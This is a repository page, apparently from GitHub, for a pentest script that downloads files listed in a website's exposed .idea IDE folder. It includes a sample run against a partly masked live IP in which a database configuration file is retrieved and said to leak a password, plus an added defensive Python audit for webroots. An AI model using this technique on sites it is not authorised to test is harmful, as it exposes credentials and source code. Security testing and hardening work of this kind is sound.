About the developer

lijiejie
236 Stars 34 Forks 4 Commits 0 Opened issues

Description

Gather sensitive information from (.idea) folder for pentesters

.idea disclosure exploit

A script that uses the .idea folder to gather sensitive information for pentesters.

Websites that are not correctly deployed leave their IDE config folder (.idea) exposed to hackers, which can lead to leaked passwords or archived data files.

The scanner will try to download all files; please recheck the local files yourself.
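
A pre-deployment check for the exposure described above, as an added example that is not part of idea_exploit: it walks a local webroot, flags any .idea folder, and lists the deployed files that folder's XML names. It assumes IntelliJ's `$PROJECT_DIR$` path macro; the function names and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Assumption: IntelliJ-family IDEs record project files as "$PROJECT_DIR$/relative/path".
PROJECT_PATH = re.compile(r"\$PROJECT_DIR\$/([^\"'<>\s]+)")

def referenced_paths(xml_path):
    """Return project-relative paths found in the attributes of one .idea XML file."""
    try:
        root = ET.parse(xml_path).getroot()
    except (ET.ParseError, OSError):
        return set()  # unreadable or malformed file: nothing to report
    found = set()
    for elem in root.iter():
        for value in elem.attrib.values():
            found.update(PROJECT_PATH.findall(value))
    return found

def audit_webroot(webroot):
    """Flag every .idea folder under webroot and the deployed files it names."""
    findings = []
    for dirpath, dirnames, _ in os.walk(webroot):
        if ".idea" not in dirnames:
            continue
        dirnames.remove(".idea")  # report the folder, do not descend into it
        idea_dir = os.path.join(dirpath, ".idea")
        revealed = set()
        for name in os.listdir(idea_dir):
            if name.endswith((".xml", ".iml")):
                revealed |= referenced_paths(os.path.join(idea_dir, name))
        # Keep only paths that really exist in the tree about to be served.
        present = sorted(p for p in revealed if os.path.isfile(os.path.join(dirpath, p)))
        findings.append({"idea_dir": os.path.relpath(idea_dir, webroot),
                         "revealed_files": present})
    return findings

def build_sample_webroot():
    """Constructed sample tree: one .idea folder naming a present and an absent file."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, ".idea"))
    os.makedirs(os.path.join(root, "cfg"))
    with open(os.path.join(root, "cfg", "DbConnCfg.json"), "w") as f:
        f.write('{"password": "constructed-sample"}')
    with open(os.path.join(root, ".idea", "workspace.xml"), "w") as f:
        f.write('<project version="4"><component name="FileEditorManager">'
                '<entry file="file://$PROJECT_DIR$/cfg/DbConnCfg.json"/>'
                '<entry file="file://$PROJECT_DIR$/old/removed.php"/>'
                '</component></project>')
    return root
```

Any non-empty result from `audit_webroot` on a build output directory means the .idea folder should be excluded from the deployment or blocked at the web server.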

Requirements

pip install lxml requests

Example

Our scanner reported a vulnerability this afternoon

scanner_pannel

As you can see, the file DbConnCfg.json leaked the db password.

D:\IQIYI.codebase\idea_exp>idea_exp.py http://107.{mask}.{mask}.151/
[+] Module name is {mask}
[+] Type is web_module
[+] About 67 urls to process
[200] /cfg/DbConnCfg.json
[200] /bi/applepay/comm.php
[200] /bi/applepay/ipn_ios.php
[404] /auth/auth_ios/auth_guest.php
...
[200] /ver/ver_util.php
All files saved to 107.{mask}.{mask}.151/idea_exp_report.html

contain_password
